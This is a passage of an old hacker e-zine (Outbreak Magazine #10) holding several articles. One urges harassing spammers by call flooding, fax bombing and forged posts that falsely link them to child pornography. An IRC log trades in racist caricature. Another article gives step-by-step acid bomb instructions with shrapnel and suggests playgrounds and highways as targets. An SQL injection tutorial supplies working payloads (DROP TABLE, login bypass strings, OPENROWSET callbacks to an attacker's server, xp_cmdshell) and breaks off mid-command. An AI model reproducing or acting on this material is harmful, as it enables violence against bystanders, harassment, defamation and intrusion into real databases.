-------------- | --------> | Local Class 5| <--------- [Fone]---------| DMS-100 | ----| IBN/ESN |------------- 2W Loop MFIDP | -------------- | ESN Trunk Group or DS-1 | | | or DS-1 | ----- --------------- | | CSC | | Local Class 5 | -------- ----- | DMS-100 | | SL-100 | <--- DS-1 ----> | IBN/ESN | -------- Facility --------------- | | | | | DS-1 Facility | DS-1 Facility | | -------- ---------- [Fone]--| Remote | | SL-1 PBX |--[Fone] | Module | | ESN Main | -------- ---------- Thanks To All The People That Helped To Contribute Any Info You Have On Dms Ал Ал ом Бл Ал Ал млл лм Бл ВлАллллпАл ммм Бл мм млллмАлппплАл Ал лл А ллБл Бл лл БллппплмБллппАлмммп АлАллл лл А ллБл Бл лл Бл АлБл Алм АмлпплАл Ал пл ллп Аллл пллмАлпллллпБл АлллпАлммлВАл Ал Outbreak Magazine Issue #10 - Article 13 of 18 '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' ========================================= Some More Ways To Get Revenge On Spammers ========================================= By: kleptic <kleptic@grex.org> http://www.kleptic.tk AIM: kl3ptic ========================================= Phone call flooding, fax bombing, and magazine subscription harassing --------------------------------------------------------------------- Unlike dropcode's text in Outbreak #10 about fighting spam. Here are some "physical ways" to get revenge. --- Most spam is designed to sell you a product. If the spammer strips out a return e-mail address, the only way to contact the spammer maybe through a phone or fax number or an ordinary mailing address. Because spam usually lists a way to contact the spammer, many people choose one of two hostile (and illegal) methods of exacting revenge on a spammer. One is phone call flooding, wherein your computer repeatedly dials the spammer's phone number, thereby preventing real customers from getting through. The other is fax bombing, which involves sending multiple faxes (usually numbering in the hundreds) to jam a spammer's fax machine with useless messages, giving them a taste of their own spamming. Both ways cost you money, but the rewards in emotional satisfaction may be worth it. Here's how you do it: Just as spammers use bulk e-mailing programs to send mass quantities of e-mail, you can use war dialers to dial numbers over and over again. You type in the phone number and how often you want to call it, then the program dials that number over and over until you tell it to stop. You can do this for voice and fax phone numbers just as well. (But beware: if you overuse this tactic, your target can get the police and phone company to trace the calls back to you. So if you fear Ma Bell, use tactics to keep yourself hidden.) For a safer but slower way to get your revenge against a spammer, copy down the spammer's postal address. Then fill out the postage paid subscription forms that come with every magazine and mail them in. Pretty soon the spammer will get flooded with magazines and a bill for each one of them. Canceling each magazine subscription will waste the spammer's time and possibly wreck their credit rating too, once multiple magazines start reporting the spammer as delinquent in paying their subscription bills. For a more automated solution for tracking down a spammer, search for a copy of SpamShot, Spamicide, or SpamHater. SpamShot lets you filter spam automatically from your e-mail account so you don't have to bother deleting it yourself. SpamHater automates the process of retrieving a spammer's real e-mail address and provides you with polite or nasty letters that you can mail back to them. Forging a spammer's messages ---------------------------- If a spammer really gets on your nerves, here's a sneaky way to make his or her life difficult. Open an Internet account (such as AOL) using a credit card (how you get that CC is your own problem). Send messages to certain Usenet newsgroups pretending to advertise products or services, using the spammer's telephone or fax number. Then cancel your account. For example, visit the social.religion.christian news-groups, leave a message advertising hardcore child pornography CD-ROM's or devil-worshipping books for sale to any "interested" parties, and leave the spammer's phone number or mailing address. You're sure to infuriate news-group members, who will retaliate by sending the hate mail to the spammer. Of course the spammer won't have any idea why so many people are suddenly calling or sending hate messages to him. Spammers are likely to continue haunting the internet, so you might as well have fun with them at their expense. Wether you decide to use hate mail, phone call flooding, e-mail bombing, or any other vengeful tactic to retaliate against spammers, as long as you're happy, who cares how the fucking spammers feel? ============================================================== Shout Outs: jenny <3, lexi, dropcode, gr3p, rambox, joja, turbo, timeless, the enigma, radioactive raindeer, everyone on #outbreakzine on dalnet, and #outbreak on irc.spasm.org. If I forgot anyone. I'm sorry. ============================================================== Ал Ал ом Бл Ал Ал млл лм Бл ВлАллллпАл ммм Бл мм млллмАлппплАл Ал лл А ллБл Бл лл БллппплмБллппАлмммп АлАллл лл А ллБл Бл лл Бл АлБл Алм АмлпплАл Ал пл ллп Аллл пллмАлпллллпБл АлллпАлммлВАл Ал Outbreak Magazine Issue #10 - Article 14 of 18 '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' lexi (n0Cixel): lexi@sugarpants.org / http://sugarpants.org jenny (sugah/heavenly): jennybean@sugarpants.org / http://sugarpants.org/heavenly Start of #dirtysouth buffer: Sun Sep 29 03:10:26 2002 * Now talking in #dirtysouth * n0CixeL has joined #dirtysouth <n0CixeL> awwwwwwwwwwwwwwwwwwwww shit <shuga> aw haaaail nah <n0CixeL> nigga word <shuga> bout to tear some crazay shit up in here, WERD <n0CixeL> ATL LIKE FUCKING WHAT <shuga> ATL <n0CixeL> nig pimpin <n0CixeL> braiding weeve <shuga> whatchoo doin? <shuga> i'm chillin <n0CixeL> buying weeve online girl <shuga> tryin to make mah legs look got so ashy <n0CixeL> weevestore.com <shuga> gurl they nasty <n0CixeL> coco buttah girl <shuga> i got me some of that new coco buttah from sally's <shuga> mmm girl <shuga> ya you know <n0CixeL> aww hell yeah <n0CixeL> that balm shit <n0CixeL> mmmhmm <shuga> shit ya gurl <shuga> gurl i got me some of that new grease for my hair <n0CixeL> that jerry curl special shit <n0CixeL> mmmhmm <n0CixeL> in the pink box <shuga> its real good but gurl, it get mah hands all nasty <n0CixeL> naw girl thats good for your hands girl <n0CixeL> that oil <n0CixeL> my skin sucks it right up <shuga> you know coco buttah helps scars girl? <n0CixeL> but i leave fingah prints on my car door <n0CixeL> if they find them <n0CixeL> i'm going to jail <n0CixeL> cause you know it be stolen <n0CixeL> hahah <shuga> tamika up at Afrikan Braids tole me that yesterday <n0CixeL> aww hell yeah <n0CixeL> she a smart girl <shuga> i saw this white boy <shuga> walkin up 10th street <shuga> actin like he some dreadlock rasta <shuga> girl he was crazy <n0CixeL> girllll there some weird folk up in the atl <n0CixeL> you BEST believe <shuga> gurl i know <shuga> i be takin mah boo wherever i go <shuga> you know dis <n0CixeL> yes girl you best believe <shuga> i meant to ask you <n0CixeL> yeah girl what up <shuga> hows quiefla? <n0CixeL> girl she fine <n0CixeL> she got gas <n0CixeL> but she be ok <shuga> yo she still roll with that nigga tyrone? <n0CixeL> that surgery on her head to get that fake weeve really messed her up <n0CixeL> all the skress <n0CixeL> she be having gas <n0CixeL> yeahhh <n0CixeL> that nigga tyrone got him an new caddy <shuga> yeah girl shasima got that shit about foe days ago <shuga> hell nah girl <n0CixeL> aww yeah girl <n0CixeL> it be tight <n0CixeL> it's an older model like an 80 <shuga> yo you remember that geeky ass nigga jerome? <n0CixeL> but he's pimpin it <shuga> guurrrl you dont know <shuga> he be blingin now <n0CixeL> aww naw that used to roll with juantiffa? <shuga> yeah gurl <n0CixeL> ooo girl hook a nigga up <shuga> he be pimpin his navigator up and down peachtree street <n0CixeL> aww hell yeah <n0CixeL> i needs to hook up with him <n0CixeL> that nigga is fine <n0CixeL> cept that gap <shuga> i wish i would have called him a broken ass nigga when he asked me to hit up tha movie "friday" <n0CixeL> in hes teefies <shuga> you know that movie girl <shuga> when it was on the big screen <shuga> wif ice cube <shuga> that nigga crazy <n0CixeL> mmhmm <n0CixeL> he's fly <n0CixeL> i'd like to sit on his cube <shuga> how are your nine sistahs girl? <n0CixeL> HEHEHEH knownsayn? <shuga> they aight? <n0CixeL> girlll they good <shuga> HAHA i feel u gurl <ajay`> what the fuck is this <shuga> yo what up? <ajay`> two guys pretending to be chicks on irc? <n0CixeL> damn nigga <n0CixeL> what's up <n0CixeL> naw we is chicks <n0CixeL> lol <n0CixeL> from the ATLLLLLLLLLL <ajay`> how'd u find this chan <shuga> where you from, gurl <shuga> dude iz the dirty souf <shuga> the dirty souf aint shiet wifout atl <n0CixeL> hell yeah girl you know <ajay`> how old are you <ajay`> shuga <shuga> but nah girl i got my eye on that nigga jermaine <shuga> 21 gurl <n0CixeL> mmm jermaine be fine <n0CixeL> i heard he's got a big member <shuga> hell yeah <n0CixeL> knowmsayn? <shuga> yeah i heard that too <n0CixeL> :) <ajay`> u got a pic? <shuga> yeah g <n0CixeL> i got my nails done today <n0CixeL> they be lookin so good <ajay`> send it <shuga> yeah lemme find one <ajay`> cool <n0CixeL> mmm ajay so what's up <n0CixeL> you got a big stick baby? <ajay`> no <n0CixeL> why not <ajay`> cmp3 [a: Psychodrama-Greatest_Hits-2000-AUD - s: 12-psychodrama-crook_county-aud.mp3] [5m14s\192kbit(44.1khz)] <ajay`> hmm <ajay`> genetics? <ajay`> maybe just chance <ajay`> you 21 also? <shuga> yeah girl this be me <shuga> hang on <shuga> http://sugarpants.org/heavenly/shuga.jpg <n0CixeL> hey girl <n0CixeL> show him me <shuga> aight girl one second <shuga> http://sugarpants.org/heavenly/n0cixel.jpg <shuga> thats mah gurl nocixel <ajay`> right <shuga> damn right girl <ajay`> heh <shuga> you know <shuga> we fly rite <shuga> ? <ajay`> nah <shuga> honey we fly as hail <shuga> when we ryde up to the club * n0CixeL has quit IRC (girl i lost my weeve) <shuga> yo i'm out like the broke ass niggas one toof <shuga> one End of #dirtysouth buffer Sun Sep 29 03:10:26 2002 lexi greets: adeamis, kleptic, dropcode, semi, lenny, blackout, smiley, tiffany, & pickled cum. jenny greets: kleptic <3, dropcode, adeamis, gr3p, rambo, tiffany, blackout, lenny, semi, smiley, pickles. MUCH LOVE FOE' CHUNKY ASS CHEESE TEEF FROM THE BOF OF US. Ал Ал ом Бл Ал Ал млл лм Бл ВлАллллпАл ммм Бл мм млллмАлппплАл Ал лл А ллБл Бл лл БллппплмБллппАлмммп АлАллл лл А ллБл Бл лл Бл АлБл Алм АмлпплАл Ал пл ллп Аллл пллмАлпллллпБл АлллпАлммлВАл Ал Outbreak Magazine Issue #10 - Article 15 of 18 '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' [The construction of an acid bomb] [by: joja] [for: outbreak #10 baby, woo!] Disclaimer: This text is for educational purposes only! If you use this text as a means to do something destructive, that's your own fault. I. What you'll need and how to get it. II. How to "safely" construct your bomb. III. Different Methods. IIII. Where to throw this fucker. I. What you'll need and how to get it. The muratic acid bomb consists of three main materials: 1. A 2-3 litre plastic bottle(for now). 2. Some aluminum foil. 3. Muratic Acid. You can play with these and use different methods, which I'll explain later. The aluminum foil and bottles are the easiest to obtain. But so is the muratic acid! You can buy muratic acid at any pool supply store. It usually comes in red one gallon jugs but, I'm unsure of the price. If they ask any questions just say your dad said he needed some for the pool, and you weren't sure. II. How to "safely" construct your bomb. To construct your acid bomb, first prepare the aluminum foil. To prepare, take the foil and crumble it into a cylindrical bar, small enough to fit into the bottle but you want to compress it. So really there's one thick bar of foil. You can use more than one alluminum "bar" as we'll call it to make it explode faster. Next, pour your muratic acid into the plastic bottle to about half way. Remember to keep the cap! Try not to inhale the fumes because they ARE toxic, and very unpleasant.The muratic acid is safe in the plastic bottle for it doesn't react to plastics, it reacts to metal, like foil :), just keep the cap off. The final step is the most crucial. Some bombs take a couple minutes, some take a couple seconds. All you do is put the aluminum bar into the bottle and cap it fast. Shake it up and throw it somewhere. Make sure you're a safe distance away from it because the acid does splatter, and you don't want it in your eyes. Within a few minutes, your bomb will explode. There's no fire or mushroom clouds, so don't try and blow up your school with acid bombs. They just make a really loud boom and have the potential to do a little damage. (Like a mailbox). III. Different methods. You can use bigger, or smaller bottles. Even glass bottles or jars for your bomb. As long as the bottle has a secure cap, it will work just fine. The one thing that should stay the same is the foil. Always use foil. Even if you want to make an acid bomb with a mason jar, some ball bearings, and nails, put the foil in there too. Shrapnel is always fun, you can use whatever you want, just be sure to get the fuck out of the way after you insert the foil and cap it. But If you are using other metals in your bomb, it will explode faster, so be careful, because that's what the acid reacts to. Metal. IIII. Where to throw this fucker. This is the fun part. There are so many places to set off your acid bomb. Such as a playground during recess, or in someone's car if thier window is down. It's easiest to get away if you're in a car, just have the acid in the bottle(un-capped),the foil and the cap ready when you find your target. Mailboxes, dumpsters, your neighbor's doggy-door. A public bathroom, even a lake. The possibilities are endless. Just be creative, be safe, and watch out for pigs. You can even through it into an intersection, or a main highway. Anything is possible. Acid bombs are phun, and I hope you have as much fun with them as I have. - joja. I wanted to be cool and have greets in my text this time :D. Greets go out to: kleptic, rambox, gr3p, turdblow, jenny, lexi, dropcode, lenny, DirV, failure, clops, drH, Mr. Bubble, Marlboro cigarettes, Pharmaceuticals, semi, debaser, redbox, rc, Mancow, dewey, Apocal, hypah, and midget. "and anyone else I forgot." -- I feel so cool right now. Ал Ал ом Бл Ал Ал млл лм Бл ВлАллллпАл ммм Бл мм млллмАлппплАл Ал лл А ллБл Бл лл БллппплмБллппАлмммп АлАллл лл А ллБл Бл лл Бл АлБл Алм АмлпплАл Ал пл ллп Аллл пллмАлпллллпБл АлллпАлммлВАл Ал Outbreak Magazine Issue #10 - Article 16 of 18 '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' ------------------------------------------------------------------------------------------ Corporate Intrusion: How an attacker gets in By: Turbanator ------------------------------------------------------------------------------------------ I would first like to start off this text by stating that I in no way endorse the use of the methods contained in this text file to be used in ANY illegal activity, this is simply for informational purposes. -=I. Choosing the victim=- When a hacker attempts to infiltrate any system, weather it be through social engineering or through computer means, they most of the time choose their targets carefully, and for some unknown (at least to the victim) reason. Most hackers, at least the "leet" ones, wont simply go out and randomly choose some company to attack just because they don't like their website layout. -=II. Probing the victim=- Now that the hacker has chosen his designated target, he can begin to look for any weaknesses the victim may have. The attacker can find out as much info on any of the employees in a company as possible, then use that information in a process known as social engineering. When a hacker is social engineering, he will most likely speak in a calm monotone voice, and use words with complicated meanings, and repeat his "given instructions" to give a sense of authority over his victim. Once the hacker has extracted the information he needs, he then proceeds to use it in the correct way. -=III. Probing the corporation=- Once the hacker has the information he needs, he can then use it accordingly on the target corporation. Normally the hacker will play around with them for a bit, to see what the employees are actually like, and get to know their strengths, and more importantly, their weaknesses. If someone at the front desk, or even in the high level offices has given out personal information about thing they like, things they hate, etc. to someone they "know," then they have most likely been a target for an attack at one time or another. Just because you've talked to Jim in accounting in the 34th cubical on the 4th floor a couple of times, doesn't mean he is your friend, and a hacker will most likely pose as Jim, so that he can become your "friend" and get the information he wants out of you. -=IV. Testing the information=- With his newly accuired sensative information, the hacker then proceeds to find a major, yet unknown weakness in the corporation, and exploit it. So with his new passwords the hacker looks around the company web site for an "employees only" login prompt. Bingo, its cleverly hidden at http://www.victimcorp.com/employeelogin.htm. Now he can access some of the internal networks of the corporation, exposing sensative information, while posing as Jim from accounting in the 34th cubical on the 4th floor, even though Jim is out sick with the flu this week... -=More to come!=- With me being my lazy self I didnt have enough time to write as much as I originally wanted to, so look for "Corporate Intrusion: Part 2: Congrats! Your hacked!" soon. ------------------------------------------------------------------------------------------ This text file was written by:Turbanator For:Outbreak The author can be contacted at:turbanator2k2@yahoo.com, AIM=Turbanator2k2 ------------------------------------------------------------------------------------------ Ал Ал ом Бл Ал Ал млл лм Бл ВлАллллпАл ммм Бл мм млллмАлппплАл Ал лл А ллБл Бл лл БллппплмБллппАлмммп АлАллл лл А ллБл Бл лл Бл АлБл Алм АмлпплАл Ал пл ллп Аллл пллмАлпллллпБл АлллпАлммлВАл Ал Outbreak Magazine Issue #10 - Article 17 of 18 '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' ###################################################################### ###............ SQL Injection: Theory and Practice ............### ###################################################################### Intro. ---------------------------------------------------------------------- Recently, I was hired by an information security firm to code some backend SQL handlers in ASP. I know what you're thinking, a security company with an IIS based webserver? This is why I'll keep the name to myself. When writing backend applications for a professional web developement project, its really important to check and double check your code for potential weaknesses. So, when I was finished writing the handlers, comparing them to my flowcharts and running them through a few standard test procedures, I began an indepth security audit. It was then that I realized the truly hazardous potential weak ASP/SQL code could have on sensitive information stored in a database. Understand that this type of attack is by no means anything new, but after scouring the web for information on this type of vuln- erability I still believe there is alot of uncharted territory. NOTE: The vulnerabilities explored in this text are NOT specific to weak ASP code and are NOT reflective of any weakness of the SQL language itself. The vulnerabilities can exist in ANY serverside program interacting with an SQL server ie ASP, PHP, CGI, etc. All examples presented here deal with ASP, however, the same vulnerabilities can be exploited on programs written in other languages using variations of the same methods. Basic SQL. ---------------------------------------------------------------------- To start, I'll build a simple, psuedo database. We'll call it "Access Card Usage LOG": Table:Log093002 ------------------- .----.---------.---------.---------.---------.---------. | ID | Date | Time | LName | FName | Door | |----|---------|---------|---------|---------|---------| | 12 | 9/30/02 | 6:26 | Smith | Tom | Front | | 31 | 9/30/02 | 6:26 | Baily | Dick | Front | | 84 | 9/30/02 | 6:41 | Hoover | Harry | Side | '----'---------'---------'---------'---------'---------' Assume the above to be an actual buildings access card useage log. Not because its important to the file, because... Its cool. Next we'll discuss the basics of SQL. For the purpose of this file, SQL is a language used to interact with databases. The language consists of a set of statements that can be used together in a logical series to create a query. SQL queries are used to read data from and manipulate the structure or contents of databases and is very similar to standard english. The following is an example of an SQL query to our database. SELECT ID, LName, Time FROM Log093002 The above could be used to determine whether or not anyone had arrived late on the date in question (9/30/02). That query would return the following: .----.---------.---------. | 12 | Smith | 6:26 | Scheduled arrival time for 9/30/02 | 31 | Baily | 6:26 | is 6:30. Bad news for mr. Hoover. | 84 | Hoover | 6:41 | *smirk* '----'---------'---------' What if we only wanted to know the arrival time of Harry Hoover? We can aquire that data using the WHERE clause, we will assume that the ID field specifies each employees unique Employee Code. SELECT ID, LName, Time FROM Log093002 WHERE ID = '84' .----.---------.---------. | 84 | Hoover | 6:41 | '----'---------'---------' The SQL language also makes use of AND, OR, NOT, etc operators along with a lot of other statements that I've left out here. For more information on SQL, I suggest reading the tutorials at w3schools.com. Weaknesses. ---------------------------------------------------------------------- Imagine a database containing a list of names, addresses and phone numbers similar to the type of database they must be using for 411 and double-o info type services online (ie switchboard.com). There is a form on their homepage where a user is able to enter various types of information that is then run through an asp handler that grabs and displays matching entries from the database. Here is a snippit from the database: .--------------.--------------.-------------------.--------------. | LastName | FirstName | Address | PNum | | ... | ... | ... | ... | | Sanders | Bill | Someplace PA | 612-555-1253 | | Borsche | Sveda | Nowhere MS | 710-555-1212 | | ... | ... | ... | ... | '--------------'--------------'-------------------'--------------' Here is an example of the form: <form id="Lookup" method="post" action="Lookup.asp"> <input id="FirstName" type="text" /> <input id="LastName" type="text" /> <input id="Address" type="text" /> <input id="PNum" type="text" /> <input id="Submit" type="submit" value="Submit" /> </form> You would enter what ever data you have and click submit. The variables would then be passed to Lookup.asp. This is where the main weakness lies. Lookup.asp's main function is to generate an SQL query based on the users input, and use it to grab data from the database. The following is an example of a weak implementation of this type of SQL query, here the user entered ONLY the phone number and the omitted asp code generated the following query: sqlQuery = "SELECT * FROM 411db WHERE PNum = '" & PNum & "'; If the number entered by the user was 710-555-1212, then the above variable would translate to this: SELECT * FROM 411db WHERE PNum = '710-555-1212' And, after querying the database, would return: .--------------.--------------.-------------------.--------------. | Borsche | Sveda | Nowhere MS | 710-555-1212 | '--------------'--------------'-------------------'--------------' NOTE: the asterisk (*) between the SELECT and FROM statements is an SQL wildcard. Just as in Dos, Unix, etc, it means 'all'. That is the logical process. Its what the developers designed the system to do, and it does it well. But what happens when we try something a little less logical? This time, instead of entering a standard ten digit phonenumber... we'll enter a less standard NO digit phone number. A standard single quote. Namely: ' In this case, Lookup.asp would generate the following SQL query: SELECT * FROM 411db WHERE PNum = ''' If Lookup.asp is vulnerable (which, in our case, it is) we would get a syntax error. In SQL every opening quote requires a closing quote. The quote we entered in the PNum input box effectively closes the first quote generated by Lookup.asp, but the last quote (also generated by Lookup.asp) is left unclosed. It is possible for us to avoid this error by using an SQL comment sequence (--). Adding this sequence to an SQL query will cause the SQL interpreter to ignore anything following the --. so, instead of entering a single quote into the PNum field, we'll enter a single quote followed by a comment sequence ('--) generating the following query: SELECT * FROM 411db WHERE PNum = ''--' The SQL interpreter would then remove the comment sequence and anything following it before processing the request: SELECT * FROM 411db WHERE PNum = '' NOTE: the dash dash (--) comment sequence is specific to MS SQL server. If the dash dash comment sequence doesn't work for you try a hash (#) as the comment character. If that still wont work, take a look at the next NOTE for another possibility. All the examples shown in this text will be using the -- comment sequence. Hold on a sec... What did we just do? We got rid of the closing quote that Lookup.asp was supposed to end the query with, and added our own! Yay! We've effectively injected completely trivial, useless code through an html form! Oh wow. How dangerous. The query we just generated is exactly what would have been generated had we submitted a completely blank form. (of course, if we entered a completely blank form, Lookup.asp may have noticed and complained if it was written with a mechanism to do so). The truly frightening part is the possiblities that arise when we begin injecting our own SQL queries. An important thing to note is that different SQLs use different delimiting characters. In the following examples we'll use a semicolon delimiter. Incase you don't know, a delimiter is a character within an SQL query (and many other languages) that determines where one command ends and another begins. Lets add to our single quote double dash ('--) input. This time We'll place a query between the ' and the -- ie: '; DROP TABLE 411db-- SELECT * FROM 411db WHERE PNum = ''; DROP TABLE 411db --' Comments removed: SELECT * FROM 411db WHERE PNum = ''; DROP TABLE 411db In this query we used the DROP TABLE statement. This particular SQL command will completely delete a table from a database. Our single quote acted as a closing quote to lookup.asp's opening quote, followed by our semicolon (;) effectively ending that first query. DROP TABLE 411db acted as a second query, completely independent of the first, and finally our -- eliminated Lookup.asp's final closing quote. In effect, useing '; DROP TABLE 411db-- as our entry caused Lookup.asp to completely delete the 411db table. The above example was just a taste of the true potential this exploit really has. Lets take a look at another database: Table:userlist ---------------- .-----.------------.------------. | UID | Username | Password | |-----|------------|------------| | 10 | john | love | | 10 | bill | sex | | 5 | dan | secret | | 0 | root | god | '-----'------------'------------' Now we're getting somewhere. This database is aslo accessed via a web form. Lets have a look at that as well: <form id="auth" method="post" action="auth.asp"> <input id="username" type="text"> <input id="password" type="password"> <input id="submit" type="submit" value="submit"> </form> And somewhere within auth.asp, a variable is loaded with an SQL query: sql = "SELECT * FROM userlist WHERE Username = '" & username & "' AND Password = '" & password & "'" auth.asp processes the request and the result is tested to see if the name and password entered match any from the list. Lets take a look at a translation of a logical interaction: SELECT * FROM userlist WHERE Username='john' AND Password='love' This request would return: .-----.------------.------------. | 10 | john | love | '-----'------------'------------' And auth.asp would go about logging john into the system. Now this is where the true beauty of this vulnerability shows through. We'll start by testing auth.asp to see if its vulnerable. If using quote as one of your inputs generates an SQL syntax error, its generally safe to assume that the asp is vulnerable. If the developer was smart, he would have filtered out quotes. So we pass a single quote (') to auth.asp as the username and the server returns a syntax error. Yay, weak code. Now that we know that auth.asp is exploitable, there are any number of ways we can use the SQL Injection technique to our advandage. For instance, in the following example I'll inject an OR operator with a true condition to our SQL query. Here I'm submitting root as my login and ' OR 0=0-- as my password: SELECT * FROM userlist WHERE Username = 'root' AND Password = '' OR 0=0--' And with the comments removed: SELECT * FROM userlist WHERE Username = 'root' AND Password = '' OR 0=0 Originally, auth.asp would ONLY log you in if your Password matched the stored Password for your Username. But with our injected code, auth.asp will log you in if your Password matches the stored Password for your Username OR if 0 is equal to 0, which it always is. NOTE: As stated in the last NOTE theres a chance that the dash dash (--) comment sequence wont work. In the case of the above query theres another possibility. The statement 0=0 has no function other than to act as a true condition. we could have just as easily said 1=1 or 9999=9999, so long as the condition we're stating is true. Knowing this along with the fact that auth.asp is adding a single quote (') to the end of our query, we can submit a statement like: ' OR 'x' = 'x which would generate: SELECT * FROM userlist WHERE Username = 'root' AND Password = '' OR 'x' = 'x' Making use of the quote we couldn't eliminate :) Its also important to know that not ALL queries have the exact same syntax, amount of parameters, types of parameters, etc and that in some circumstances you may have to use a double quote (") in place of a single quote. Here some variations to try: ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x It may look daunting, but its quite simple to grasp if you try. I would suggest trying to understand before you ctrl-c ctrl-v the crap out of someone. Maybe we want to build ourselves a root account... We could simply inject '; INSERT INTO USERS values( 0, Dade, zeroco0l )-- causing the following query to be submitted: SELECT * FROM userlist WHERE Username = ''; INSERT INTO USERS values( 0, Dade, zeroco0l ) There. Two completely independent queries, the latter adding a new account to the database. Wait a second... I see a problem here. In order for us to add an account, we would have to know previously that the table consists of three columns. Additionally, we'd need to know What data to store in which column. By default, ASP returns detailed descriptions of all errors. This is very fortunate because some of the details listed in the errors can potentially leak information pertaining to the structure of tables within the target database. We'll make use of the ASP error messages as an enumeration technique to map out the userlist table. SELECT * FROM userlist WHERE Username = '' HAVING 0=0 Passing auth.asp the above query (using ' HAVING 0=0-- as our input) would cause the program to error out and often display the error report to the user. The reason that query errors out is because of the way we used the HAVING clause. HAVING is supposed to be used on a table column thats been called and sorted with the GROUP BY clause. In our case, no columns were sorted using GROUP BY and because we use the * wildcard to grab ALL the columns, we'd get an error on the first column called which is the first column in the table. The neat thing is that the error report contains the name of the table AND the name of the column that caused the error :). Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft] [ODBC SQL Server Driver] [SQL Server] Column 'userlist.UID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /auth.asp, line 28 From the above error report we have determined that the tables name is userlist and the first column in the table is called UID. I've already explained above, but I'll try one more time for anyone who's lost at this point. 'SELECT * FROM userlist' grabs every column in the table 'userlist' one by one. We use the HAVING clause incorrectly to purposely generate a syntax error. Because HAVING looks at the column in question, which in our case is the FIRST column, the error is generated ON that column and the server bitches, 'hey asshole, I tried doing what you asked, but the first column isn't sorted and I can't use HAVING on an unsorted column. I'll just wait here till you sort the column with GROUP BY.' Lets take another step. We'll try the same thing, only this time we'll use the GROUP BY clause to sort the first column. The SQL server will have no trouble using the HAVING clause on that first, sorted column but immediately afterwards, it will try using HAVING on the second column (because we're using *) and since the second column isn't sorted, we'll error out there. SELECT * FROM userlist WHERE Username = '' GROUP BY userlist.UID HAVING 0=0 userlist.UID passes the HAVING test fine, but the second column causes the following error: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft] [ODBC SQL Server Driver] [SQL Server] Column 'userlist.Username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /auth.asp, line 28 We can continue this method and eventually map out the entire table. Once we have the entire table we'll know exactly how to format our input to add records to the table. For instance, after mapping out the userlist table, we'd know the columns are UID, Username, Password and could then add our own login to the table with the correct criteria. Just to keep you up to pace, heres what the last query of our mapping procedure would look like: SELECT * FROM userlist WHERE Username = '' GROUP BY userlist.UID, userlist.Username, userlist.Password HAVING 0=0 Here, all the columns in the table have been sorted and the query wont error out. :) There are other important things that can be gleaned from sql error messages. Lets take a look at the UNION statement. UNION is used to merge the results of two separate queries. It is required that both queries have matching datatypes. For instance: SELECT age FROM boys UNION SELECT age FROM girls; Note that in this example both age in boys and age in girls are of the type 'integer'. But what would happen if we were to attempt to merge a string to an integer? Lets see. In userlist we have 3 columns, the first being an integer, the following two being strings. Lets pair up the first integer in userlist (UID) with a string using the UNION statement and see how it errors out: SELECT * FROM userlist WHERE Username = '' UNION 'wo0t', 'x', 'x' Here we've paired the integer 10 in userlist's column UID with the string 'wo0t'. This will produce the following error: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error converting the char value 'wo0t' to a column of data type int. /auth.asp, line 28 boohaw. SQL has reported the actual contents of the string we passed it ('wo0t'). This is a good way to pull a bit more info from the SQL server. For instance, SQL server comes equipped with a built in constant called @@version. Stored within @@version is some detailed information about the version, build, release of the sql server running and the platform it is running on. Lets submit the same type of query, but this time we'll pair the integer column UID with the string constant @@version: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error converting the char value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright 1988-2000 Microsoft Corporation Enterprise Edition on Windows 2000 2.0 (Build 6132: Service Pack 3) ' to a column of data type int. /auth.asp, line 28 *nods* interesting. Unlike most compile and run or copy and paste exploits, SQL Injection requires a little bit of cleverness, so for anyone interested, there's a list of @@ constants at: http://www.ddart.net/mssql/sql2000/html/ maybe you'll find something to do with them that I havn't :) Now, in an attempt to thwart these types of attacks, a savvy sysadmin can configure his sql server to not display these errors to the user. On top of that, there are plenty of other ways an administrator can stop potential attackers by making it difficult for them to see the results of their queries. All of a sudden things look a little bleak. Never fear, theres more :) If you can't see error messages, and theres nothing in the .asp that you can force to display your queries results in the browser, how can you do anything? Its like hacking blind. Well, Theres an SQL statement suited to this problem. OPENROWSET is a component of SQL that has the ability to grab data from/pass data too remote databases. Using OPENROWSET its possible to do plenty of fun things. For instance lets say the attacker has SQL Server running on his system. He queries the sql server he's attacking and recieves no error msg... So how does he know its even vulnerable? he can use OPENROWSET in his query to have the victim sql server attempt to pull data from HIS sql server. He'd notice the inbound connection on his system and, therefore know that hes executing queries on the target server :) He would do that with the following injection: SELECT * FROM userlist WHERE Username = ''; SELECT * FROM OPENROWSET('SQLoledb', uid=username; pwd=password network=DBMSSOCN;address=0.0.0.0,31337;', 'SELECT * FROM userlist') As you know, the first query is created by auth.asp and not important to us in anyway. we've successfully injected the second query, beginning with the second SELECT statement. This will connect to a remote SQL server running on port 31337 of 0.0.0.0 (of course the attacker would change these to the ip,port that his sql server was running on. The attacker would then watch with his firewall or packet logging software or what have you for the inbound connection. Now it is, of course, possible that the system the target servers running on is behind a firewall. If the firewall wont allow outbound connections to port 31337 then the above attack wouldn't work. This is not necessarily a bad thing though... We can use this behaviour to determine the firewalls rulesets :) Try various ports and determine which ones we can initiate outbound connections through. This is particularly useful when we come to realize that the SQL language comes equipped with the ability to upload and execute files on the server. This can be accomplished using the xp_cmdshell procedure. xp_cmdshell is basically an SQL command that will spawn a command shell and pass arguments to it. Anyone thats used DOS extensively can probably think of plenty of fun things to do with this procedure. For instance, lets use the dos command ECHO and the append operator (>>) to construct a .vbs file on the servers filesystem: SELECT * FROM userlist where USERNAME = ''; exec 